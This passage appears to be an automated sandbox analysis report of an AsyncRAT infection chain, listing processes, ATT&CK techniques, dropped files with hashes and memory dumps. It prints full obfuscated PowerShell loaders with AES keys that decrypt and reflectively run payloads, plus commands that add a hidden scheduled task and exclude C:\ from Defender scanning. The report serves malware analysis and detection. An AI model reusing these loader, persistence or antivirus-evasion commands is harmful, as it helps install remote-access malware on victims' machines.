-join '')('/21C5PLzK2uu1MqJwEaXWg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ IEX '$bbKFI=New-Object System.IO.MOBFOBFUSCUDAemOBFOBFUSCUDAorOBFOBFUSCUDAySOBFOBFUSCUDAtrOBFOBFUSCUDAeaOBFOBFUSCUDAm(,$param_var);'.Replace('OBFOBFUSCUDA', ''); IEX '$tDIwH=New-Object System.IO.OBFOBFUSCUDAMOBFOBFUSCUDAeOBFOBFUSCUDAmOBFOBFUSCUDAoOBFOBFUSCUDArOBFOBFUSCUDAyOBFOBFUSCUDASOBFOBFUSCUDAtOBFOBFUSCUDArOBFOBFUSCUDAeOBFOBFUSCUDAaOBFOBFUSCUDAmOBFOBFUSCUDA;'.Replace('OBFOBFUSCUDA', ''); IEX '$FlJeX=New-Object System.IO.COBFOBFUSCUDAomOBFOBFUSCUDAprOBFOBFUSCUDAeOBFOBFUSCUDAssOBFOBFUSCUDAioOBFOBFUSCUDAn.OBFOBFUSCUDAGZOBFOBFUSCUDAipOBFOBFUSCUDAStOBFOBFUSCUDAreOBFOBFUSCUDAamOBFOBFUSCUDA($bbKFI, [IO.COBFOBFUSCUDAomOBFOBFUSCUDAprOBFOBFUSCUDAesOBFOBFUSCUDAsiOBFOBFUSCUDAonOBFOBFUSCUDA.CoOBFOBFUSCUDAmpOBFOBFUSCUDAreOBFOBFUSCUDAssOBFOBFUSCUDAiOBFOBFUSCUDAoOBFOBFUSCUDAnOBFOBFUSCUDAMode]::DOBFOBFUSCUDAeOBFOBFUSCUDAcOBFOBFUSCUDAompOBFOBFUSCUDAreOBFOBFUSCUDAss);'.Replace('OBFOBFUSCUDA', ''); $FlJeX.CopyTo($tDIwH); $FlJeX.Dispose(); $bbKFI.Dispose(); $tDIwH.Dispose(); $tDIwH.ToArray();}function execute_function($param_var,$param2_var){ IEX '$MjSwFSGHYBZqPaI=[System.ROBFOBFUSCUDAeOBFOBFUSCUDAflOBFOBFUSCUDAectOBFOBFUSCUDAioOBFOBFUSCUDAn.OBFOBFUSCUDAAsOBFOBFUSCUDAseOBFOBFUSCUDAmbOBFOBFUSCUDAlOBFOBFUSCUDAyOBFOBFUSCUDA]::LOBFOBFUSCUDAoOBFOBFUSCUDAaOBFOBFUSCUDAdOBFOBFUSCUDA([byte[]]$param_var);'.Replace('OBFOBFUSCUDA', ''); IEX '$VyBmptOMNBIcWYPebJsgSRdMOvuMeIdNHOLgKxPDXxeUXQJIiwYGxUPevOxUZcHfyUuinIuDUOjvMiPYLLDHKwpNYHLVaVEVPZwcvAvzcuMILurmYzioyaubEGjGXyDZknFNLNCkqeEqJHcDpzXBMq=$MjSwFSGHYBZqPaI.OBFOBFUSCUDAEOBFOBFUSCUDAnOBFOBFUSCUDAtOBFOBFUSCUDArOBFOBFUSCUDAyOBFOBFUSCUDAPOBFOBFUSCUDAoOBFOBFUSCUDAiOBFOBFUSCUDAnOBFOBFUSCUDAtOBFOBFUSCUDA;'.Replace('OBFOBFUSCUDA', ''); IEX '$VyBmptOMNBIcWYPebJsgSRdMOvuMeIdNHOLgKxPDXxeUXQJIiwYGxUPevOxUZcHfyUuinIuDUOjvMiPYLLDHKwpNYHLVaVEVPZwcvAvzcuMILurmYzioyaubEGjGXyDZknFNLNCkqeEqJHcDpzXBMq.OBFOBFUSCUDAIOBFOBFUSCUDAnOBFOBFUSCUDAvOBFOBFUSCUDAoOBFOBFUSCUDAkOBFOBFUSCUDAeOBFOBFUSCUDA($null, $param2_var);'.Replace('OBFOBFUSCUDA', '');}$Le = 'C:\Users\Admin\AppData\Local\Temp\c.bat';$host.UI.RawUI.WindowTitle = $Le;$gUKFXTSqvy=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($Le).Split([Environment]::NewLine);foreach ($wU in $gUKFXTSqvy) { if ($wU.StartsWith(':: ')) { $s=$wU.Substring(3); break; }}$payloads_var=[string[]]$s.Split('\');IEX '$payload1_var=decompress_function (decrypt_function ([OBFOBFUSCUDACOBFOBFUSCUDAoOBFOBFUSCUDAnOBFOBFUSCUDAvOBFOBFUSCUDAeOBFOBFUSCUDArt]::OBFOBFUSCUDAFOBFOBFUSCUDArOBFOBFUSCUDAoOBFOBFUSCUDAmOBFOBFUSCUDABOBFOBFUSCUDAaOBFOBFUSCUDAse6OBFOBFUSCUDA4OBFOBFUSCUDASOBFOBFUSCUDAtOBFOBFUSCUDAriOBFOBFUSCUDAnOBFOBFUSCUDAgOBFOBFUSCUDA($payloads_var[0])));'.Replace('OBFOBFUSCUDA', '');IEX '$payload2_var=decompress_function (decrypt_function ([OBFOBFUSCUDACOBFOBFUSCUDAoOBFOBFUSCUDAnOBFOBFUSCUDAvOBFOBFUSCUDAeOBFOBFUSCUDArOBFOBFUSCUDAt]::OBFOBFUSCUDAFOBFOBFUSCUDArOBFOBFUSCUDAoOBFOBFUSCUDAmOBFOBFUSCUDABOBFOBFUSCUDAaOBFOBFUSCUDAsOBFOBFUSCUDAeOBFOBFUSCUDA6OBFOBFUSCUDA4OBFOBFUSCUDASOBFOBFUSCUDAtrOBFOBFUSCUDAiOBFOBFUSCUDAnOBFOBFUSCUDAg($payloads_var[1])));'.Replace('OBFOBFUSCUDA', '');execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('OBFOBFUSCUDA'));
        5⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Modifies registry class
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:3260
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'svchoststr871_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\inicia_str_871.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
        6⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2536
      - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\inicia_str_871.vbs"
        6⤵
        Checks computer location settings
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:5012
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\inicia_str_871.bat" "
        7⤵
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:2440
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ IEX '#EspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNK '.Replace('Espaco', ''); $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Rr8+grcZJNGH203eeUxXpnDWX4hdpd2UTJfbowjN1dY='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('/21C5PLzK2uu1MqJwEaXWg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ IEX '$bbKFI=New-Object System.IO.MOBFOBFUSCUDAemOBFOBFUSCUDAorOBFOBFUSCUDAySOBFOBFUSCUDAtrOBFOBFUSCUDAeaOBFOBFUSCUDAm(,$param_var);'.Replace('OBFOBFUSCUDA', ''); IEX '$tDIwH=New-Object System.IO.OBFOBFUSCUDAMOBFOBFUSCUDAeOBFOBFUSCUDAmOBFOBFUSCUDAoOBFOBFUSCUDArOBFOBFUSCUDAyOBFOBFUSCUDASOBFOBFUSCUDAtOBFOBFUSCUDArOBFOBFUSCUDAeOBFOBFUSCUDAaOBFOBFUSCUDAmOBFOBFUSCUDA;'.Replace('OBFOBFUSCUDA', ''); IEX '$FlJeX=New-Object System.IO.COBFOBFUSCUDAomOBFOBFUSCUDAprOBFOBFUSCUDAeOBFOBFUSCUDAssOBFOBFUSCUDAioOBFOBFUSCUDAn.OBFOBFUSCUDAGZOBFOBFUSCUDAipOBFOBFUSCUDAStOBFOBFUSCUDAreOBFOBFUSCUDAamOBFOBFUSCUDA($bbKFI, [IO.COBFOBFUSCUDAomOBFOBFUSCUDAprOBFOBFUSCUDAesOBFOBFUSCUDAsiOBFOBFUSCUDAonOBFOBFUSCUDA.CoOBFOBFUSCUDAmpOBFOBFUSCUDAreOBFOBFUSCUDAssOBFOBFUSCUDAiOBFOBFUSCUDAoOBFOBFUSCUDAnOBFOBFUSCUDAMode]::DOBFOBFUSCUDAeOBFOBFUSCUDAcOBFOBFUSCUDAompOBFOBFUSCUDAreOBFOBFUSCUDAss);'.Replace('OBFOBFUSCUDA', ''); $FlJeX.CopyTo($tDIwH); $FlJeX.Dispose(); $bbKFI.Dispose(); $tDIwH.Dispose(); $tDIwH.ToArray();}function execute_function($param_var,$param2_var){ IEX '$MjSwFSGHYBZqPaI=[System.ROBFOBFUSCUDAeOBFOBFUSCUDAflOBFOBFUSCUDAectOBFOBFUSCUDAioOBFOBFUSCUDAn.OBFOBFUSCUDAAsOBFOBFUSCUDAseOBFOBFUSCUDAmbOBFOBFUSCUDAlOBFOBFUSCUDAyOBFOBFUSCUDA]::LOBFOBFUSCUDAoOBFOBFUSCUDAaOBFOBFUSCUDAdOBFOBFUSCUDA([byte[]]$param_var);'.Replace('OBFOBFUSCUDA', ''); IEX '$VyBmptOMNBIcWYPebJsgSRdMOvuMeIdNHOLgKxPDXxeUXQJIiwYGxUPevOxUZcHfyUuinIuDUOjvMiPYLLDHKwpNYHLVaVEVPZwcvAvzcuMILurmYzioyaubEGjGXyDZknFNLNCkqeEqJHcDpzXBMq=$MjSwFSGHYBZqPaI.OBFOBFUSCUDAEOBFOBFUSCUDAnOBFOBFUSCUDAtOBFOBFUSCUDArOBFOBFUSCUDAyOBFOBFUSCUDAPOBFOBFUSCUDAoOBFOBFUSCUDAiOBFOBFUSCUDAnOBFOBFUSCUDAtOBFOBFUSCUDA;'.Replace('OBFOBFUSCUDA', ''); IEX '$VyBmptOMNBIcWYPebJsgSRdMOvuMeIdNHOLgKxPDXxeUXQJIiwYGxUPevOxUZcHfyUuinIuDUOjvMiPYLLDHKwpNYHLVaVEVPZwcvAvzcuMILurmYzioyaubEGjGXyDZknFNLNCkqeEqJHcDpzXBMq.OBFOBFUSCUDAIOBFOBFUSCUDAnOBFOBFUSCUDAvOBFOBFUSCUDAoOBFOBFUSCUDAkOBFOBFUSCUDAeOBFOBFUSCUDA($null, $param2_var);'.Replace('OBFOBFUSCUDA', '');}$Le = 'C:\Users\Admin\AppData\Roaming\inicia_str_871.bat';$host.UI.RawUI.WindowTitle = $Le;$gUKFXTSqvy=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($Le).Split([Environment]::NewLine);foreach ($wU in $gUKFXTSqvy) { if ($wU.StartsWith(':: ')) { $s=$wU.Substring(3); break; }}$payloads_var=[string[]]$s.Split('\');IEX '$payload1_var=decompress_function (decrypt_function ([OBFOBFUSCUDACOBFOBFUSCUDAoOBFOBFUSCUDAnOBFOBFUSCUDAvOBFOBFUSCUDAeOBFOBFUSCUDArt]::OBFOBFUSCUDAFOBFOBFUSCUDArOBFOBFUSCUDAoOBFOBFUSCUDAmOBFOBFUSCUDABOBFOBFUSCUDAaOBFOBFUSCUDAse6OBFOBFUSCUDA4OBFOBFUSCUDASOBFOBFUSCUDAtOBFOBFUSCUDAriOBFOBFUSCUDAnOBFOBFUSCUDAgOBFOBFUSCUDA($payloads_var[0])));'.Replace('OBFOBFUSCUDA', '');IEX '$payload2_var=decompress_function (decrypt_function ([OBFOBFUSCUDACOBFOBFUSCUDAoOBFOBFUSCUDAnOBFOBFUSCUDAvOBFOBFUSCUDAeOBFOBFUSCUDArOBFOBFUSCUDAt]::OBFOBFUSCUDAFOBFOBFUSCUDArOBFOBFUSCUDAoOBFOBFUSCUDAmOBFOBFUSCUDABOBFOBFUSCUDAaOBFOBFUSCUDAsOBFOBFUSCUDAeOBFOBFUSCUDA6OBFOBFUSCUDA4OBFOBFUSCUDASOBFOBFUSCUDAtrOBFOBFUSCUDAiOBFOBFUSCUDAnOBFOBFUSCUDAg($payloads_var[1])));'.Replace('OBFOBFUSCUDA', '');execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('OBFOBFUSCUDA'));
        8⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:3428

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -WindowStyle Hidden -c .('Add-MpP' + 'reference') -ExclusionPath C:\ -ExclusionProcess powershell.exe
1⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4380

C:\Windows\system32\taskkill.exe
taskkill /IM cmstp.exe /F
1⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2032

C:\Windows\system32\wbem\WmiApSrv.exe
C:\Windows\system32\wbem\WmiApSrv.exe
1⤵
PID:2348

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
9751fcb3d8dc82d33d50eebe53abe314

SHA1
7a680212700a5d9f3ca67c81e0e243834387c20c

SHA256
ad2e3139aa438f799c4a876ca3e64af772b8a5786149925a08389723e42394d7

SHA512
54907cc18684ff892b737496183ca60c788d8f5d76365586954f269dbd50ac1b9cd48c7c50bd6ca02009e6020fd77a8282c9a7ad6b824a20585c505bd7e13709

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
17KB

MD5
3e0435a547783e459c6d3837e89db4e3

SHA1
564f37cddef7107c55db6e185203c0109e3c499a

SHA256
fdb92f206d99996fdaa91807a640ab573cfc4c504c8f8f59ab5b7856ba775896

SHA512
2b5fd5384483a17993b4a1e1bb914162204b8ba2265365bebc6548727d29213c89bc746c13c7689b6ea73c1db562b53b92618d4f0dac26d18e2258becfba886e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
4a94b4432dca934df6651a53f56abe6b

SHA1
1461c5bc22eaef55ed98713d67a4c5f5c8e11d69

SHA256
63455ddf3d736ca85a5a6805851142c18f28b9987d5f6caa9dd490269b34f8a2

SHA512
8f262e5b722138e3b1576e89528a46c031a0239939d45916e0a688ca802c6de3d3ddf19391a6b5660ac7fb9dc9da25eb9c2ad8fd77ed798175a09e2095cb94b6

Download Submit
C:\Users\Admin\AppData\Local\Temp\4698_output.vbs

Filesize
203KB

MD5
4b6a750839856ab620fbdfc0250b3efd

SHA1
95474dd9bcf969c408911fa7500dc3ccc6416596

SHA256
41e24d66f8bb13b08c6a41c4b4a2cbd52056edd2a17bec6f30fe3838db6d1f2d

SHA512
0ce01f73301a57ca6dfacd135705f8662ba2cdd390da4afb0f9af27135f494da93d24fe5489a92de0f50766c63cef6b13db1095751f4c9f22f52d7aad87f8357

Download Submit
C:\Users\Admin\AppData\Local\Temp\AsyncRAT.exe

Filesize
6.4MB

MD5
97a429c4b6a2cb95ece0ddb24c3c2152

SHA1
6fcc26793dd474c0c7113b3360ff29240d9a9020

SHA256
06899071233d61009a64c726a4523aa13d81c2517a0486cc99ac5931837008e5

SHA512
524a63f39e472bd052a258a313ff4f2005041b31f11da4774d3d97f72773f3edb40df316fa9cc2a0f51ea5d8ac404cfdd486bab6718bae60f0d860e98e533f89

Download Submit
C:\Users\Admin\AppData\Local\Temp\RESD793.tmp

Filesize
1KB

MD5
7c26c447c98b3737070ff52b7cb55337

SHA1
88432c8803bd54e6c58247097e5cf6dc236e7030

SHA256
c8ba6f825a4cc8ff6c7ded5a1c2852ca4e5cae7efb70569fcc42b90d6864ff43

SHA512
3ec37f321f1920115e4bcb5a6429906fb765f54503d60ec7d972e89bcee5590f50793c0d6867221d9573b224e015acfd2528f13485c738a79d7c85b30d34cf5f

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_bj41zwz5.yvc.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\c.bat

Filesize
74KB

MD5
5232ae6fddae8282c999a2af864b6740

SHA1
32036e875da948a42c6ee56f3efa6fd3eff57072

SHA256
a385fb3a490d7d72e6ab967898ce90f68262816655a6978d398cb51cfbed0c4e

SHA512
09a0c7c1bf434cefd3159d11842d570ec862cda5559bd7db3b2839809397189744b4a1a6927392b42fa6842463c477d4fe9c616d9e6549d5eafe9fbc19838130

Download Submit
C:\Users\Admin\AppData\Local\Temp\copz1giv\copz1giv.dll

Filesize
4KB

MD5
40a781a5a00e2f885d574c3d46dcccc9

SHA1
ba6eb625d97e9b4fa46c4c91c9b3d7d07b3643e8

SHA256
596ab142ec748ab0c23fa8dff6444f2357c72f6e9c2fb894a790d5e6b489f475

SHA512
5b97af581b8f97c93b18e5cae06f95a68436764f64403044e493c587455e61589fcb91b3a7d926a03800e18e91f3b465a2d9690f1bf5e542eb308f250e1267c1

Download Submit
C:\Users\Admin\AppData\Roaming\inicia_str_871.vbs

Filesize
114B

MD5
8f70a387cc74f7aed67748f2a2a472fa

SHA1
29e394ab857e2bcb03a1253d654408b21cf02094

SHA256
5f430548767db15d724d686dded70c169a53c1b6bb77269bec89b75cd5e246e6

SHA512
e4954ad933203cc33cdc1bb09b09ca9051361cd88e358c98adb18708eeb6dc435f7ea8d82cb9b3b09dab0d2b2b5b52bcb0ed800df2a54f85b44d13966c4d3e84

Download Submit
C:\windows\temp\khxbaa2i.inf

Filesize
663B

MD5
27581dbbe3c3840ce72f99c21071898a

SHA1
898afeb9523df9367c74a01c0dbecf6b637f3cb1

SHA256
c5f2bbdebccd52c3eba3c97a251ffa2ccd01f64de764e560f804045fe868d27b

SHA512
0b9c4531e8be5b292638cb2cad7fd1b72ed3f1aa20ea027b9a013a8bfb2daaa4a25a40c37423e0924d110bbbbfad4a6e21aa03f4694978d205d7ac9739567d9f

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\copz1giv\CSC4994E992B7542B289E4FED4A6C8252E.TMP

Filesize
652B

MD5
6a3c05e777f1d4b2a33f3ec4aab741ee

SHA1
8a0ccc8c5f515ad81f263232de134002df6d58ee

SHA256
22e7eaaad253de7bcf19e7d7d4a616e2f0a9b709b26bc2450ecb2bb7a9ebb9ed

SHA512
223302d566e97c0e123a87a658661ed981524d866536bc7191f67fa2b17a75b7507e2b4bfa1dc6c56935aaf947c6ad5f77760b735af0b8fd1273791626978f02

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\copz1giv\copz1giv.0.cs

Filesize
2KB

MD5
b8106096972fb511e0cf8b99386ecf93

SHA1
3003ba3a3681ba16d124d5b2305e6cc59af79b44

SHA256
49d2a0f78cbec3d87396b6f52f791c66505edeec87a70d4ce45721288210da02

SHA512
218bd9cd17c56d2e138205a197780cc2a5a81bfce7d5439eecb168f61955ba97793e7333425c064f6b6337e1f70c75bd373a7fb502a8c538fb046600018f871e

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\copz1giv\copz1giv.cmdline

Filesize
369B

MD5
87b3cf7f14a61015f4089ad3996c7b5d

SHA1
cb3c73890bb2ecd6b075c3795844850a1035ba7f

SHA256
29ba83e99b0c29982c4cecdf1a5db2f4ab9054a125f58baf58a5dcb1f4669226

SHA512
e73af961104fabdf3214aef20d6b3e157eb64bbf575981c90c2fd2010f07a36b223396144bf0610b0cdf58023c146f821ca3b76d14d9b8bf6cdd4f24346ebd96

Download Submit
memory/224-2-0x00007FF7526E0000-0x00007FF7530B3000-memory.dmp

Filesize
9.8MB

Download
memory/2536-92-0x0000000007260000-0x0000000007292000-memory.dmp

Filesize
200KB

Download
memory/2536-107-0x00000000075C0000-0x00000000075D1000-memory.dmp

Filesize
68KB

Download
memory/2536-106-0x0000000007640000-0x00000000076D6000-memory.dmp

Filesize
600KB

Download
memory/2536-105-0x0000000007430000-0x000000000743A000-memory.dmp

Filesize
40KB

Download
memory/2536-104-0x00000000072A0000-0x0000000007343000-memory.dmp

Filesize
652KB

Download
memory/2536-103-0x0000000006620000-0x000000000663E000-memory.dmp

Filesize
120KB

Download
memory/2536-93-0x0000000070B70000-0x0000000070BBC000-memory.dmp

Filesize
304KB

Download
memory/2704-20-0x000001C7FFF20000-0x000001C7FFF42000-memory.dmp

Filesize
136KB

Download
memory/2704-34-0x000001C79C110000-0x000001C79C118000-memory.dmp

Filesize
32KB

Download
memory/2704-21-0x000001C7FFF50000-0x000001C7FFF6C000-memory.dmp

Filesize
112KB

Download
memory/3260-61-0x0000000005A10000-0x0000000005A32000-memory.dmp

Filesize
136KB

Download
memory/3260-63-0x00000000061D0000-0x0000000006236000-memory.dmp

Filesize
408KB

Download
memory/3260-79-0x0000000006DE0000-0x0000000006DE8000-memory.dmp

Filesize
32KB

Download
memory/3260-80-0x0000000006DF0000-0x0000000006DFE000-memory.dmp

Filesize
56KB

Download
memory/3260-81-0x00000000087F0000-0x0000000008D94000-memory.dmp

Filesize
5.6MB

Download
memory/3260-77-0x0000000008170000-0x00000000087EA000-memory.dmp

Filesize
6.5MB

Download
memory/3260-76-0x0000000006D90000-0x0000000006DDC000-memory.dmp

Filesize
304KB

Download
memory/3260-75-0x00000000067E0000-0x00000000067FE000-memory.dmp

Filesize
120KB

Download
memory/3260-73-0x0000000006280000-0x00000000065D4000-memory.dmp

Filesize
3.3MB

Download
memory/3260-78-0x0000000006D10000-0x0000000006D2A000-memory.dmp

Filesize
104KB

Download
memory/3260-62-0x00000000060F0000-0x0000000006156000-memory.dmp

Filesize
408KB

Download
memory/3260-60-0x0000000005AC0000-0x00000000060E8000-memory.dmp

Filesize
6.2MB

Download
memory/3260-59-0x00000000033E0000-0x0000000003416000-memory.dmp

Filesize
216KB

Download
memory/3428-128-0x0000000005920000-0x0000000005932000-memory.dmp

Filesize
72KB

Download
memory/3428-129-0x0000000007330000-0x00000000073CC000-memory.dmp

Filesize
624KB

Download
memory/4536-10-0x00000207774A0000-0x00000207776F2000-memory.dmp

Filesize
2.3MB

Download
memory/4536-8-0x000002075C7C0000-0x000002075CE2A000-memory.dmp

Filesize
6.4MB

Download